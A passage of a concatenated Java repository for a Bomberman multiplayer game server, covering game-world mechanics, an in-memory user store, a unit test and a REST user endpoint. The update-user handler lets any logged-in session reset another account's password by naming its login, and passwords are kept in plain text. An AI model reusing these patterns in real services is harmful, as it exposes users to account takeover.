private final UserProfile user;
private final Room room;
private final JSONObject message;
}
<file_sep>/src/main/java/bomberman/mechanics/tiles/functors/IncreaseBombRangeFunctor.java
package bomberman.mechanics.tiles.functors;
import bomberman.mechanics.Bomberman;
import bomberman.mechanics.World;
import bomberman.mechanics.WorldEvent;
import bomberman.mechanics.interfaces.EventType;
public class IncreaseBombRangeFunctor extends ActionTileAbstractFunctor {
public IncreaseBombRangeFunctor(World eventList) {
super(eventList);
}
@Override
public void applyAction(Bomberman bomberman) {
bomberman.increaseExplosionRange();
eventList.addWorldEvent(new WorldEvent(EventType.TILE_REMOVED, owner.getType(), owner.getID(), 0, 0, bomberman.getID()));
}
}
<file_sep>/src/main/java/bomberman/mechanics/interfaces/IEntity.java
package bomberman.mechanics.interfaces;
public interface IEntity extends Updateable, Describable{
}
<file_sep>/src/main/java/main/databaseservice/DataBaseServiceHashMapImpl.java
package main.databaseservice;
import org.jetbrains.annotations.Nullable;
import rest.UserProfile;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.atomic.AtomicLong;
public class DataBaseServiceHashMapImpl implements DataBaseService {
@Override
public void save(UserProfileData dataSet) {
}
@Override
@Nullable
public UserProfile addUser(String login, String password, boolean isGuest) {
if (containsLogin(login))
return null;
final UserProfileData newUserData = new UserProfileData(login, password, isGuest);
newUserData.setId(idCounter.incrementAndGet());
final UserProfile newUser = new UserProfile(newUserData);
loginToUser.put(login, newUser);
idToUser.put(newUser.getId(), newUser);
return newUser;
}
@Nullable
@Override
public UserProfile addUser(String login, String password) {
return addUser(login, password, false);
}
@Override
@Nullable
public UserProfile getById(long id) {
return idToUser.get(id);
}
@Override
@Nullable
public UserProfile getByLogin(String name) {
return loginToUser.get(name);
}
@Override
public Collection<UserProfile> getUsers() {
return idToUser.values();
}
@Override
public boolean containsID(Long id) {
return idToUser.containsKey(id);
}
@Override
public boolean containsLogin(String name) {
return loginToUser.containsKey(name);
}
@Override
public void deleteUser(Long id) {
final UserProfile deletingUser = idToUser.get(id);
idToUser.remove(id);
loginToUser.remove(deletingUser.getLogin());
}
@Nullable
@Override
@Deprecated
public Collection<UserProfile> getTop10Users() {
return getUsers(); // I'm lazy.
}
private final AtomicLong idCounter = new AtomicLong();
private final Map<String, UserProfile> loginToUser = new HashMap<>();
private final Map<Long, UserProfile> idToUser = new HashMap<>();
}
<file_sep>/src/main/java/bomberman/mechanics/worldbuilders/BasicWorldBuilder.java
package bomberman.mechanics.worldbuilders;
import bomberman.mechanics.TileFactory;
import bomberman.mechanics.World;
import bomberman.mechanics.interfaces.*;
import javax.inject.Singleton;
@Singleton
public class BasicWorldBuilder implements IWorldBuilder {
@Override
public WorldData getWorldData(World supplicant) {
return new WorldData(getITileArray(supplicant), getBombermenSpawns(), getName());
}
private ITile[][] getITileArray(World supplicant) {
// Array has dimensions YxX because java multi-dimensional arrays are arrays of arrays.
// This means [first][] bracket pair is number of array we want to access.
// And [][second] bracket pair is true position of an element we want to access.
// Thus [Y][X] element means Xth element in Yth row.
final ITile[][] tileArray = new ITile[DEFAULT_WORLD_HEIGHT][DEFAULT_WORLD_WIDTH];
// Filling left and right borders
for (int j = 0; j < tileArray.length; ++j)
{
tileArray[j][0] = TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
tileArray[j][DEFAULT_WORLD_HEIGHT - 1] = TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
}
// Filling top and bottom borders except for first and las columns: something is already there.
for (int i = 1; i < tileArray[0].length - 1; ++i)
{
tileArray[0][i] = TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
tileArray[DEFAULT_WORLD_WIDTH - 1][i] = TileFactory.getInstance().getNewTile(EntityType.UNDESTRUCTIBLE_WALL, supplicant.getNextID());
}
return tileArray;
}
// x y
private float[][] getBombermenSpawns() {
return new float[][]{{1.0f, 1.0f},{1.0f, (float)(DEFAULT_WORLD_HEIGHT - 1)},{(float)(DEFAULT_WORLD_WIDTH - 1), 1.0f},{(float)(DEFAULT_WORLD_HEIGHT - 1), (float)(DEFAULT_WORLD_WIDTH - 1)}};
}
@SuppressWarnings("SameReturnValue")
private String getName() {
return "REPORT AS A BUG";
}
private static final int DEFAULT_WORLD_HEIGHT = 32;
private static final int DEFAULT_WORLD_WIDTH = 32;
}
<file_sep>/src/test/java/rest/UserProfileTest.java
package rest;
import main.databaseservice.UserProfileData;
import org.json.JSONException;
import org.json.JSONObject;
import org.junit.Test;
import java.util.HashMap;
import java.util.Map;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotSame;
public class UserProfileTest {
@Test
public void testToJson() throws JSONException {
final JSONObject userJson = new UserProfile(new UserProfileData("", "")).toJson();
final JSONObject fieldsJson = new JSONObject().put("id", -1).put("login", "").put("score", 0).put("userpic_path", JSONObject.NULL);
assertEquals(fieldsJson.toString(), userJson.toString());
}
@Test
public void testGetDifferentSessionID() {
final UserProfile user1 = new UserProfile(new UserProfileData("user1", ""));
final UserProfile user2 = new UserProfile(new UserProfileData("user2", ""));
assertNotSame(user1.getSessionID(), user2.getSessionID());
}
@Test
public void testGetPassword() throws Exception {
final String password = "<PASSWORD>";
final UserProfile user = new UserProfile(new UserProfileData("login", password));
assertEquals(password, user.getPassword());
}
@Test
public void testSetPassword() throws Exception {
String password = "<PASSWORD>";
final UserProfile user = new UserProfile(new UserProfileData("login", password));
password = "<PASSWORD>";
assertNotSame(password, user.getPassword());
user.setPassword(password);
assertEquals(password, user.getPassword());
}
@Test
public void testGetScore() throws Exception {
final int score = 0;
final UserProfile user = new UserProfile(new UserProfileData("login", "password"));
assertEquals(score, user.getScore());
}
@Test
public void testSetScore() throws Exception {
final int score = 1;
final UserProfile user = new UserProfile(new UserProfileData("login", "password"));
assertNotSame(score, user.getScore());
user.setScore(score);
assertEquals(score, user.getScore());
}
@Test
public void testHashCode() throws Exception {
final UserProfile user1 = new UserProfile(new UserProfileData("admin", "admin"));
user1.getData().setId(1);
final UserProfile user2 = new UserProfile(new UserProfileData("guest", "1234"));
assertEquals(user1.hashCode(), user1.hashCode());
assertNotSame(user1.hashCode(), user2.hashCode());
final Map<Long, UserProfile> map = new HashMap<>();
map.put(user1.getId(), user1);
assertEquals(false, map.isEmpty());
assertEquals(user1, map.get(user1.getId()));
map.put(user2.getId(), user2);
assertEquals(false, map.isEmpty());
assertEquals(user1, map.get(user1.getId()));
assertEquals(user2, map.get(user2.getId()));
assertNotSame(user1, map.get(user2.getId()));
assertNotSame(user2, map.get(user1.getId()));
}
@Test
public void testEquals() throws Exception {
final UserProfile user1 = new UserProfile(new UserProfileData("admin", "admin"));
final UserProfile user2 = new UserProfile(new UserProfileData("guest", "1234"));
assertEquals(user1, user1);
assertEquals(false, user2.equals(user1));
}
}<file_sep>/src/main/java/bomberman/mechanics/World.java
package bomberman.mechanics;
import bomberman.mechanics.interfaces.*;
import bomberman.mechanics.tiles.behaviors.BombRayBehavior;
import bomberman.mechanics.worldbuilders.WorldData;
import bomberman.service.TimeHelper;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.javatuples.Pair;
import org.javatuples.Triplet;
import org.jetbrains.annotations.Nullable;
import java.util.*;
import java.util.concurrent.ConcurrentLinkedQueue;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.stream.Collectors;
public class World {
public World(String worldType) {
final IWorldBuilder builder = WorldBuilderForeman.getWorldBuilderInstance(worldType);
final WorldData worldData = builder.getWorldData(this);
tileArray = worldData.getTileArray();
spawnLocations = worldData.getSpawnList();
name = worldData.getName();
registerNewTiles();
}
public void addWorldEvent(WorldEvent worldEvent) {
newEventQueue.add(worldEvent);
}
public int getNextID() {
return uidManager.getAndIncrement();
}
public Queue<WorldEvent> getFreshEvents() {
final Queue<WorldEvent> newQueue = new LinkedList<>(processedEventQueue);
processedEventQueue.clear();
return newQueue;
}
// For linking to Players via Room
public int[] getBombermenIDs(){
final int[] ids = new int[bombermen.size()];
int i = 0;
for (Bomberman bomberman : bombermen)
ids[i++] = bomberman.getID();
return ids;
}
public int getNumberOfSpawns() {
return spawnLocations.length;
}
public void spawnBombermen(int amount){
if (spawnLocations.length < amount)
throw new ArrayIndexOutOfBoundsException();
for (int i = 0; i < amount; ++i) {
final Bomberman newBomberman = new Bomberman(getNextID(), this, spawnLocations[i]);
newBomberman.setCoordinates(spawnLocations[i]);
bombermen.add(newBomberman);
processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, newBomberman.getType(), newBomberman.getID(), spawnLocations[i][0], spawnLocations[i][1], null));
}
}
public void spawnBots() {
final int bombermenAlreadySpawned = bombermen.size();
final int numberOfBotsToBeSpawned = spawnLocations.length - bombermen.size();
for (int i = 0; i < numberOfBotsToBeSpawned; ++i) {
final Bomberman newBomberman = new BombermanBot(getNextID(), this, spawnLocations[i + bombermenAlreadySpawned]);
newBomberman.setCoordinates(spawnLocations[i + bombermenAlreadySpawned]);
bombermen.add(newBomberman);
processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, newBomberman.getType(), newBomberman.getID(), spawnLocations[i + bombermenAlreadySpawned][0], spawnLocations[i + bombermenAlreadySpawned][1], null));
}
}
public String getName() {
return name;
}
public int getWidth() {
return tileArray[0].length;
}
public int getHeight() {
return tileArray.length;
}
public boolean shouldBeUpdated() {
return selfUpdatingEntities > 0 || !newEventQueue.isEmpty() || !delayedEventQueue.isEmpty();
}
public void runGameLoop(long deltaT) {
updateEverything(deltaT);
while (!newEventQueue.isEmpty())
{
final WorldEvent elderEvent = newEventQueue.poll();
switch (elderEvent.getEventType()){
case ENTITY_UPDATED:
processEntityUpdatedEvent(elderEvent);
break;
case TILE_SPAWNED:
processTileSpawnedEvent(elderEvent);
break;
case TILE_REMOVED:
processTileRemovedEvent(elderEvent);
break;
}
}
tryMovingBombermen(deltaT);
}
public int getBombermanCount() {
return bombermen.size();
}
//// For bot
public ITile[][] getTiles() {
return tileArray;
}
public ArrayList<Bomberman> getBombermen() {
return bombermen;
}
////
private void processEntityUpdatedEvent(WorldEvent event) {
LOGGER.debug("Processing object_updated");
assignBombermanMovement(event);
}
// Run only once at the very beginning
private void registerNewTiles() {
for (int y = 0; y < tileArray.length; ++y) {
final ITile[] row = tileArray[y];
for (int x = 0; x < tileArray[y].length; ++x) {
final ITile tile = row[x];
if (tile != null)
processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, tile.getType(), tile.getID(), x, y, null));
}
}
}
private void processTileSpawnedEvent(WorldEvent event) {
LOGGER.debug("Processing object_spawned");
if (event.getEntityType() == EntityType.BOMB)
tryPlacingBomb(event.getEntityID(), false);
else placeTile(event);
}
private void processTileRemovedEvent(WorldEvent event) {
LOGGER.debug("Processing object_destroyed");
if (event.getEntityType() == EntityType.BOMB)
explodeBomb(event);
else if (event.getEntityType() == EntityType.BOMB_RAY)
dissipateBombRay(event);
else if (event.getEntityType() == EntityType.BOMBERMAN)
killBomberman(event);
else removeTileByID(event.getEntityID(), event.getInitiator());
}
private void assignBombermanMovement(WorldEvent event) {
final Bomberman actor = getBombermanByID(event.getEntityID());
if (actor == null) {
LOGGER.warn("No bomberman with id \"" + event.getEntityID() + "\" exists!");
return;
}
actor.addMovement(new Triplet<>(event.getX(), event.getY(), event.getTimestamp()));
}
// Movements are not at the same time, they have bomberman spawn priorities over timestap priorities! Bad, yet should work on small deltaT intervals.
private void tryMovingBombermen(long deltaT) {
for (Bomberman bomberman : bombermen) {
Triplet<Float, Float, Long> previousMovement = bomberman.getMovementDirection();
final boolean wasUpdating = bomberman.shouldBeUpdated();
long timeSpentMoving = 0;
while (bomberman.getMovementsDuringTick().peek() != null) {
final Triplet<Float, Float, Long> movement = bomberman.getMovementsDuringTick().poll();
long dt = movement.getValue2() - previousMovement.getValue2();
if (dt > deltaT)
dt = deltaT;
timeSpentMoving += dt;
tryMovingBomberman(bomberman, movement.getValue0(), movement.getValue1(), dt);
activateTilesWereSteppedOn(bomberman);
previousMovement = movement;
}
bomberman.setMovementDirection(previousMovement);
if (!wasUpdating && bomberman.shouldBeUpdated())
selfUpdatingEntities++;
if (wasUpdating && !bomberman.shouldBeUpdated())
selfUpdatingEntities--;
tryMovingBomberman(bomberman, previousMovement.getValue0(), previousMovement.getValue1(), deltaT - timeSpentMoving);
activateTilesWereSteppedOn(bomberman);
}
}
// Hard maths. PM @Xobotun to get an explanation, don't be shy!
@SuppressWarnings("OverlyComplexMethod")
private void tryMovingBomberman(Bomberman actor, float dx, float dy, long deltaT) {
if (dx == 0 && dy == 0 || deltaT <= 0)
return;
final int worldWidth = tileArray[0].length;
final int worldHeight = tileArray.length;
final float x = actor.getCoordinates()[0];
final int ix = (int) Math.floor(x);
final float y = actor.getCoordinates()[1];
final int iy = (int) Math.floor(y);
final float xSpeed = actor.getMaximalSpeed() * (float) (dx / Math.sqrt(dx * dx + dy * dy));
final float ySpeed = actor.getMaximalSpeed() * (float) (dy / Math.sqrt(dx * dx + dy * dy));
float predictedX = x + xSpeed * deltaT;
float predictedY = y + ySpeed * deltaT;
final float radius = Bomberman.DIAMETER / 2;
float xBoundary = ix;
float yBoundary = iy;
if (dx == 0 && x + radius > xBoundary + 1 || dx > 0)
xBoundary++;
if (dy == 0 && y + radius > yBoundary + 1 || dy > 0)
yBoundary++;
if (predictedX - radius < 0 && x < 1) // If leaving world borders to left
predictedX = radius;
else if (predictedX + radius > worldWidth && x > worldWidth - 1) // If leaving world borders to right
predictedX = worldWidth - radius;
else if (dx < 0 && predictedX - radius < xBoundary) { // If moving left and entering left tile
final ITile leftTile = tileArray[iy][ix - 1];
if (leftTile != null && !leftTile.isPassable())
predictedX = xBoundary + radius; // If should collide, collide
}
else if (dx > 0 && predictedX + radius > xBoundary) {
final ITile rightTile = tileArray[iy][ix + 1];
if (rightTile != null && !rightTile.isPassable())
predictedX = xBoundary - radius;
}
if (predictedY - radius < 0 && y < 1)
predictedY = radius;
else if (predictedY + radius > worldHeight && y > worldHeight - 1)
predictedY = worldHeight - radius;
else if (dy < 0 && predictedY - radius < yBoundary) {
final ITile upTile = tileArray[iy - 1][ix];
if (upTile != null && !upTile.isPassable())
predictedY = yBoundary + radius;
}
else if (dy > 0 && predictedY + radius > yBoundary) {
final ITile downTile = tileArray[iy + 1][ix];
if (downTile != null && !downTile.isPassable())
predictedY = yBoundary - radius;
}
//noinspection OverlyComplexBooleanExpression,MagicNumber
if (x > 0.5 && x < worldWidth - 0.5 && y > 0.5 && y < worldHeight - 0.5) {
final float xDeviationFromTileCenter = - (ix + 0.5f - predictedX);
final float yDeviationFromTileCenter = - (iy + 0.5f - predictedY);
final boolean shouldCheckX = Math.abs(xDeviationFromTileCenter) > 0.5f - radius;
final boolean shouldCheckY = Math.abs(yDeviationFromTileCenter) > 0.5f - radius;
if (shouldCheckX && shouldCheckY) {
final float distanceToXBorder = (0.5f - Math.abs(xDeviationFromTileCenter));
final float distanceToYBorder = (0.5f - Math.abs(yDeviationFromTileCenter));
final double squaredDistanceToCorner = distanceToXBorder * distanceToXBorder + distanceToYBorder * distanceToYBorder;
if (squaredDistanceToCorner < radius * radius) {
final int yTile = iy + ((yDeviationFromTileCenter > 0) ? 1 : -1);
final int xTile = ix + ((xDeviationFromTileCenter > 0) ? 1 : -1);
final ITile cornerTile = tileArray[yTile][xTile];
if (cornerTile != null && !cornerTile.isPassable())
if (Math.abs(xSpeed) > Math.abs(ySpeed)) {
final float yIntersectionCorrection = (float) Math.sqrt(radius * radius - distanceToXBorder * distanceToXBorder) - distanceToYBorder;
final int direction = (yDeviationFromTileCenter > 0) ? -1 : 1;
predictedY += yIntersectionCorrection * direction;
} else {
final float xIntersectionCorrection = (float) Math.sqrt(radius * radius - distanceToYBorder * distanceToYBorder) - distanceToXBorder;
final int direction = (xDeviationFromTileCenter > 0) ? -1 : 1;
predictedX += xIntersectionCorrection * direction;
}
}
}
}
for (Bomberman bomberman : bombermen) // Low-quality inter-bomberman collision checker.
if (bomberman.getID() != actor.getID()) {
final float xDistance = Math.abs(predictedX - bomberman.getCoordinates()[0]);
final float yDistance = Math.abs(predictedY - bomberman.getCoordinates()[1]);
final float distance = (float) Math.sqrt(xDistance * xDistance + yDistance * yDistance);
if (distance <= radius * 2 + ACTION_TILE_HANDICAP_DIAMETER)
return;
}
// Sanity check if timestep is too big
if (predictedX - radius < 0)
predictedX = radius;
if (predictedX + radius > worldWidth)
predictedX = worldWidth - radius;
if (predictedY - radius < 0)
predictedY = radius;
if (predictedY + radius > worldHeight)
predictedY = worldHeight - radius;
actor.setCoordinates(new float[]{ predictedX, predictedY});
processedEventQueue.add(new WorldEvent(EventType.ENTITY_UPDATED, EntityType.BOMBERMAN, actor.getID(), predictedX, predictedY, actor.getID()));
}
private void activateTilesWereSteppedOn(Bomberman actor) {
final float x = actor.getCoordinates()[0];
final float y = actor.getCoordinates()[1];
final float handicappedRadius = (Bomberman.DIAMETER - ACTION_TILE_HANDICAP_DIAMETER) / 2;
final Set<Pair<Integer, Integer>> uniqueTileCoordinates = new HashSet<>(4);
uniqueTileCoordinates.add(new Pair<>((int) Math.floor(x - handicappedRadius), (int) Math.floor(y - handicappedRadius)));
uniqueTileCoordinates.add(new Pair<>((int) Math.floor(x - handicappedRadius), (int) Math.floor(y + handicappedRadius)));
uniqueTileCoordinates.add(new Pair<>((int) Math.floor(x + handicappedRadius), (int) Math.floor(y - handicappedRadius)));
uniqueTileCoordinates.add(new Pair<>((int) Math.floor(x + handicappedRadius), (int) Math.floor(y + handicappedRadius)));
final Set<ITile> uniqueTiles = new HashSet<>(4);
uniqueTiles.addAll(uniqueTileCoordinates.stream().map(uniqueCoordinate -> tileArray[uniqueCoordinate.getValue1()][uniqueCoordinate.getValue0()]).collect(Collectors.toList()));
uniqueTiles.stream().filter(uniqueTile -> uniqueTile != null).forEach(uniqueTile -> uniqueTile.applyAction(actor));
}
public void tryPlacingBomb(int bombermanID, boolean force) {
final Bomberman actor = getBombermanByID(bombermanID);
if (actor == null)
return;
final int x = (int) Math.floor(actor.getCoordinates()[0]);
final int y = (int) Math.floor(actor.getCoordinates()[1]);
if (actor.canSpawnBomb() && tileArray[y][x] == null || force)
{
tileArray[y][x] = TileFactory.getInstance().getNewTile(EntityType.BOMB, this, actor, getNextID());
actor.takeOnePlaceableBomb();
actor.resetBombTimer();
selfUpdatingEntities++;
processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, EntityType.BOMB, tileArray[y][x].getID(), x, y, bombermanID));
}
}
@SuppressWarnings("OverlyComplexMethod")
private void explodeBomb(WorldEvent event) {
int x = -1;
int y = -1;
Ownable bomb = null;
for (int j = 0; j < tileArray.length; ++j)
for (int i = 0; i < tileArray[0].length; ++i)
if (tileArray[j][i] != null && tileArray[j][i].getID() == event.getEntityID()) {
x = i;
y = j;
bomb = (Ownable) tileArray[y][x];
}
if (bomb == null) {
LOGGER.error("Non-existent bomb #" + event.getEntityID() + " has exploded! O_o");
return;
}
final Bomberman owner = bomb.getOwner();
final int radius = owner.getBombExplosionRange();
tileArray[y][x] = null;
owner.returnOnePlaceableBomb();
selfUpdatingEntities--;
processedEventQueue.add(event);
for (int i = 0; i >= -radius; --i)
if (x + i >= 0)
if (destroyTileAndSpawnRay(x + i, y, owner))
break;
for (int i = 1; i <= radius; ++i)
if (x + i < tileArray[0].length)
if (destroyTileAndSpawnRay(x + i, y, owner))
break;
for (int i = -1; i >= -radius; --i)
if (y + i >= 0)
if (destroyTileAndSpawnRay(x, y + i, owner))
break;
for (int i = 1; i <= radius; ++i)
if (y + i < tileArray.length)
if (destroyTileAndSpawnRay(x, y + i, owner))
break;
}
private boolean destroyTileAndSpawnRay(int x, int y, Bomberman owner) {
if (tileArray[y][x] != null && !tileArray[y][x].isDestructible()) // stop if undestuctible
return true;
boolean result = false;
if (tileArray[y][x] != null && tileArray[y][x].isDestructible()) {
while (tileArray[y][x] != null)
processTileRemovedEvent(new WorldEvent(EventType.TILE_REMOVED, tileArray[y][x].getType(), tileArray[y][x].getID(), x, y, owner.getID()));
result = true; // if destructible, destroy tile, spawn ray and break loop.
}
if (tileArray[y][x] == null) {
tileArray[y][x] = TileFactory.getInstance().getNewTile(EntityType.BOMB_RAY, this, owner, getNextID());
selfUpdatingEntities++;
processedEventQueue.add(new WorldEvent(EventType.TILE_SPAWNED, EntityType.BOMB_RAY, tileArray[y][x].getID(), x, y, owner.getID()));
}
return result;
}
private void dissipateBombRay(WorldEvent event) {
removeTileByID(event.getEntityID(), event.getInitiator());
selfUpdatingEntities--;
processedEventQueue.add(event);
}
private void killBomberman(WorldEvent event) {
final Bomberman deadOne = getBombermanByID(event.getEntityID());
if (deadOne != null && deadOne.shouldDropBombOnDeath())
tryPlacingBomb(deadOne.getID(), true);
bombermen.remove(deadOne);
processedEventQueue.add(event);
}
private void decideToSpawnRandomBonus(int x, int y) {
if (randomizer.nextInt(100) < PERCENT_TO_SPAWN_BONUS) {
final EntityType type;
switch (Math.abs(randomizer.nextInt() % TileFactory.getBonusCount())) {
case 0:
type = EntityType.BONUS_INCMAXRANGE;
LOGGER.debug("Spawning " + type + " at x: " + x + ", y: " + y);
break;
case 1:
type = EntityType.BONUS_DECBOMBSPAWN;
LOGGER.debug("Spawning " + type + " at x: " + x + ", y: " + y);
break;
case 2:
type = EntityType.BONUS_INCMAXHP;
LOGGER.debug("Spawning " + type + " at x: " + x + ", y: " + y);
break;
case 3:
type = EntityType.BONUS_INCSPEED;
LOGGER.debug("Spawning " + type + " at x: " + x + ", y: " + y);
break;
case 4:
type = EntityType.BONUS_MOREBOMBS;
LOGGER.debug("Spawning " + type + " at x: " + x + ", y: " + y);
break;
case 5:
type = EntityType.BONUS_DROPBOMBONDEATH;
LOGGER.debug("Spawning " + type + " at x: " + x + ", y: " + y);
break;
case 6:
type = EntityType.BONUS_INVUL;
LOGGER.debug("Spawning " + type + " at x: " + x + ", y: " + y);
break;
default:
LOGGER.warn("Random bonus numbergenerator failed! It is greater than 5!");
return;
}
delayedEventQueue.add(new Pair<>(new WorldEvent(EventType.TILE_SPAWNED, type, getNextID(), x, y, null), TimeHelper.now() + BombRayBehavior.BOMB_RAY_DURATION));
}
}
@Nullable
private Bomberman getBombermanByID(int id) {
Bomberman result = null;
for (Bomberman bomberman : bombermen)
if (bomberman.getID() == id)
result = bomberman;
return result;
}
private void updateEverything(long deltaT) {
for (Bomberman bomberman : bombermen)
bomberman.update(deltaT);
for (ITile[] row: tileArray)
for (ITile tile: row)
if (tile != null)
tile.update(deltaT);
delayedEventQueue.stream().filter(event -> TimeHelper.now() >= event.getValue1()).forEach(event -> {
newEventQueue.add(event.getValue0());
delayedEventQueue.remove(event);
});
}
private void removeTileByID(int id, @Nullable Integer initiator) {
for (int y = 0; y < tileArray.length; ++y)
for (int x = 0; x < tileArray[0].length; ++x)
if (tileArray[y][x] != null && tileArray[y][x].getID() == id) {
if (tileArray[y][x].shouldSpawnBonusOnDestruction())
decideToSpawnRandomBonus(x, y);
processedEventQueue.add(new WorldEvent(EventType.TILE_REMOVED, tileArray[y][x].getType(), tileArray[y][x].getID(), x, y, initiator));
tileArray[y][x] = null;
}
}
private void placeTile(WorldEvent event) {
final ITile newTile = TileFactory.getInstance().getNewTile(event.getEntityType(), this, event.getEntityID());
tileArray[(int) event.getY()][(int) event.getX()] = newTile;
processedEventQueue.add(event);
}
private final Queue<WorldEvent> newEventQueue = new ConcurrentLinkedQueue<>(); // Here are new events are stashed
private final Queue<WorldEvent> processedEventQueue = new ConcurrentLinkedQueue<>(); // State describer will take events from this list.
private final Queue<Pair<WorldEvent, Long>> delayedEventQueue = new ConcurrentLinkedQueue<>();
private final AtomicInteger uidManager = new AtomicInteger(0);
private final Random randomizer = new Random();
private final String name;
private final ITile[][] tileArray;
private final ArrayList<Bomberman> bombermen = new ArrayList<>(4);
private final float[][] spawnLocations;
private int selfUpdatingEntities = 0;
public static final float ACTION_TILE_HANDICAP_DIAMETER = 0.05f; // 0.75-0.05 will
public static final int PERCENT_TO_SPAWN_BONUS = 20;
private static final Logger LOGGER = LogManager.getLogger(World.class);
}
<file_sep>/src/main/java/rest/Users.java
package rest;
import main.accountservice.AccountService;
import javax.imageio.ImageIO;
import javax.inject.Inject;
import javax.inject.Singleton;
import javax.servlet.http.HttpServletRequest;
import javax.ws.rs.*;
import javax.ws.rs.core.*;
import main.UserTokenManager;
import org.imgscalr.Scalr;
import org.jetbrains.annotations.TestOnly;
import org.json.*;
import java.awt.image.BufferedImage;
import java.awt.image.RenderedImage;
import java.io.File;
import java.io.IOException;
import java.util.Collection;
import java.util.Map;
import java.util.Properties;
@Singleton
@Path("user/")
public class Users {
@Inject
private main.config.Context context;
public void setup() {
if (!wasSetUp) {
wasSetUp = true;
@SuppressWarnings("unchecked") final Map<String, String> properties = (Map<String, String>) context.get(Properties.class);
this.accountService = (AccountService) context.get(AccountService.class);
this.staticPath = properties.get("static_path");
this.userpicWidth = Integer.parseInt(properties.get("userpic_width"));
this.userpicHeight = Integer.parseInt(properties.get("userpic_height"));
}
}
@TestOnly
public void setContext(@SuppressWarnings("SameParameterValue") main.config.Context context) {
wasSetUp = false;
this.context = context;
}
@PUT
@Consumes(MediaType.APPLICATION_JSON)
@Produces(MediaType.APPLICATION_JSON)
public Response createUser(String jsonString, @Context HttpHeaders headers){
setup();
accountService.logoutUser(UserTokenManager.getSIDStringFromHeaders(headers));
final JSONObject jsonRequest;
try {
jsonRequest = new JSONObject(jsonString);
} catch (JSONException ex) {
return WebErrorManager.badJSON();
}
final String login;
final String password;
final boolean isGuest;
final JSONArray errorList = WebErrorManager.showFieldsNotPresent(jsonRequest, "login","password");
if (errorList == null){
login = jsonRequest.get("login").toString();
password = jsonRequest.get("password").toString();
isGuest = (jsonRequest.has("isGuest")) && jsonRequest.getBoolean("isGuest");
}
else
return WebErrorManager.accessForbidden(errorList);
final UserProfile newUser = accountService.createNewUser(login, password, isGuest);
if (newUser != null) {
accountService.loginUser(newUser);
return Response.ok(new JSONObject().put("id", newUser.getId()).toString()).cookie(UserTokenManager.getNewCookieWithSessionID(newUser.getSessionID())).build();
}
else
return WebErrorManager.accessForbidden("User already exists!");
}
@GET
@Produces(MediaType.APPLICATION_JSON)
public Response getAllUsers() {
setup();
final JSONArray responseJSON = new JSONArray();
final Collection<UserProfile> userData = accountService.getAllUsers();
if (userData == null)
return WebErrorManager.serverError();
for (UserProfile user : userData)
responseJSON.put(user.toJson());
return Response.ok(responseJSON.toString()).build();
}
@GET
@Path("top10")
@Produces(MediaType.APPLICATION_JSON)
public Response getTop10Users() {
setup();
final JSONArray responseJSON = new JSONArray();
final Collection<UserProfile> userData = accountService.getTop10Users();
if (userData == null)
return WebErrorManager.serverError();
for (UserProfile user : userData)
responseJSON.put(user.toJson());
return Response.ok(responseJSON.toString()).build();
}
@GET
@Path("{id}")
@Produces(MediaType.APPLICATION_JSON)
public Response getUserByID(@PathParam("id") Long id) {
setup();
final UserProfile user = accountService.getUser(id);
if(user == null){
return WebErrorManager.accessForbidden();
} else {
return Response.ok(user.toJson().toString()).build();
}
}
@POST
@Consumes(MediaType.APPLICATION_JSON)
@Produces(MediaType.APPLICATION_JSON)
public Response updateUser(String jsonString, @Context HttpHeaders headers){
setup();
if (accountService.hasSessionID(UserTokenManager.getSIDStringFromHeaders(headers)))
{
final JSONObject jsonRequest;
try {
jsonRequest = new JSONObject(jsonString);
} catch (JSONException ex) {
return WebErrorManager.badJSON();
}
final String login;
final JSONArray errorList = WebErrorManager.showFieldsNotPresent(jsonRequest, "login");
if (errorList == null){
login = jsonRequest.get("login").toString();
}
else
return WebErrorManager.accessForbidden(errorList);
final UserProfile user = accountService.getUser(login);
if (user != null){
final String password = jsonRequest.get("password").toString();
if (password != null)
user.setPassword(password);
/*final String userpic = jsonRequest.get("userpic64").toString();
if (userpic != null)
user.setUserpicPath(userpic);*/
accountService.updateUser(user);
return Response.ok(new JSONObject().put("id", user.getId()).toString()).build();
}
else
return WebErrorManager.serverError("Session exists, but user does not!");
} else
return WebErrorManager.authorizationRequired("Not logged in!");
}
@POST
@Consumes(MediaType.MULTIPART_FORM_DATA)
@Produces(MediaType.APPLICATION_JSON)
public Response updateUserPic(HttpServletRequest request, @Context HttpHeaders headers) {
setup();
if (accountService.hasSessionID(UserTokenManager.getSIDStringFromHeaders(headers))) {
final RenderedImage newUserpic;
//noinspection OverlyBroadCatchBlock
try {
final File uploadedUserpic = (File) request.getPart("userpic");
final BufferedImage resizableImage = ImageIO.read(uploadedUserpic);
newUserpic = Scalr.resize(resizableImage, userpicWidth, userpicHeight);
} catch (Exception ex) {
return WebErrorManager.badRequest("Could not parse uploaded file!");
}
final UserProfile user = accountService.getBySessionID(UserTokenManager.getSIDStringFromHeaders(headers));
if (user != null) {
final String path;
if (user.getUserpicPath() == null)
path = staticPath + "user" + user.getId() + ".jpg";
else
path = user.getUserpicPath();
final File currentUserpic = new File(path);
try {
ImageIO.write(newUserpic, ".jpg", currentUserpic);
} catch (IOException ex) {
WebErrorManager.serverError("Could not save new picture!");
}
accountService.updateUserpic(user, path);
return Response.ok(new JSONObject().put("userpic", user.getId()).toString()).build();
} else
return WebErrorManager.serverError("Session exists, but user does not!");
} else
return WebErrorManager.authorizationRequired("Not logged in!");
}
@DELETE
@Path("{id}")
@Produces(MediaType.APPLICATION_JSON)
public Response deleteUser(@PathParam("id") Long id, @Context HttpHeaders headers){
setup();
if (accountService.hasSessionID(UserTokenManager.getSIDStringFromHeaders(headers)))
{
final UserProfile supplicant = accountService.getBySessionID(UserTokenManager.getSIDStringFromHeaders(headers));
if (supplicant == null)
